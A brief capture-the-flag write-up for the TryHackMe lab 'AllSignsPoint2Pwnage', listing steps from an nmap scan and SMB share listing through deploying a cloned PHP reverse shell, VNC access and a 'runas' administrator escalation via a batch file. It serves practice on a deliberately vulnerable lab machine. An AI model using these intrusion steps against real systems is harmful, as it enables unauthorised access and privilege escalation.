TryHackMe | AllSignsPoint2Pwnage

nmap -sS -sV -vv --top-ports 1000 10.10.104.217 | grep open
Initial nmap scan
smbclient -L 10.10.104.217
git clone https://github.com/ivan-sincek/php-reverse-shell
Edit php-reverse-shell.php
initial shell
net share command
Install_www_and_deploy.bat
xvncviewer -QualityLevel 2 ip.address
  • Step 1: Double-click on the user_flag.txt
  • Step 2: Change the contents of the user_flag.txt file to be runas /user:administrator cmd.exe
  • Step 3: Save the file as pwn2.bat; my first attempt at a PowerShell escalation didn’t work quite so well.
  • Step 4: Double-click the pwn2.bat and paste in the admin password. #profit!
pwnage
complete
